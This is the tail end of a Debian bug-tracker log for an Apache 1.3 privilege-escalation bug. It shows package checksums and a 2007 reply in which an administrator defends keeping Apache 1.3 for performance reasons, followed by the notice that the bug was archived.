 4dea161f9e084ea5401fab72b6b14b6b 391546 web optional apache_1.3.34-4.1_i386.deb
 071048620aacb308fc1e32cec750aaab 495578 web optional apache-ssl_1.3.34-4.1_i386.deb
 7422fc04219409db5746111ff09ad772 509832 web optional apache-perl_1.3.34-4.1_i386.deb
 7719dda4ad7c973fc94bca3a7548435c 8820208 devel extra apache-dbg_1.3.34-4.1_i386.deb
 7afb9b0e07218cdb584219360a6ef8b6 848416 web optional apache-common_1.3.34-4.1_i386.deb
 55a3d44ec1c84e0e5b0c92564f83de82 485840 perl optional libapache-mod-perl_1.29.0.4-4.1_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFF6ivXipBneRiAKDwRAkp/AJ933S6O4xY34E/+WzFFn6g3dGFF3gCbBP6n
X5NY8Hud36HIoI3Zua7uhRg=
=YQJc
-----END PGP SIGNATURE-----




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Apache Maintainers <debian-apache@lists.debian.org>:
Bug#357561; Package apache. (full text, mbox, link).


Acknowledgement sent to Michelle Konzack <linux4michelle@freenet.de>:
Extra info received and forwarded to list. Copy sent to Debian Apache Maintainers <debian-apache@lists.debian.org>. (full text, mbox, link).


Message #125 received at 357561@bugs.debian.org (full text, mbox, reply):

From: Michelle Konzack <linux4michelle@freenet.de>
To: Moritz Muehlenhoff <jmm@inutil.org>, 357561@bugs.debian.org
Subject: Re: Bug#357561: privilege escalation hole
Date: Mon, 5 Mar 2007 17:25:04 +0100
[Message part 1 (text/plain, inline)]
Am 2007-03-02 00:33:56, schrieb Moritz Muehlenhoff:
> Indeed, I'm quite disappointed about apache 1.3 still being in Etch.
> Debian is the _only_ distribution still shipping it; the maintainers
> couldn't provide _any_ valid reason to still include it (like an important
> module not ported to 2.x) and claimed that they would provide all security
> updates for 1.3 issues. Well...

Because 1.3 is on an Sempron 2200+ with 3 GByte of memory and
over 400 VHosts using php5 several times faster then apache2?

2.0 would force me to a unneccesary Mainboard, CPU and Memory
upgrade...

Thanks, Greetings and nice Day
    Michelle Konzack
    Systemadministrator
    Tamay Dogan Network
    Debian GNU/Linux Consultant


-- 
Linux-User #280138 with the Linux Counter, http://counter.li.org/
##################### Debian GNU/Linux Consultant #####################
Michelle Konzack   Apt. 917                  ICQ #328449886
                   50, rue de Soultz         MSM LinuxMichi
0033/6/61925193    67100 Strasbourg/France   IRC #Debian (irc.icq.com)
[signature.pgp (application/pgp-signature, inline)]

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 26 Jun 2007 03:38:46 GMT) (full text, mbox, link).


Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Thu Mar 28 14:28:22 2024; Machine Name: bembo

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.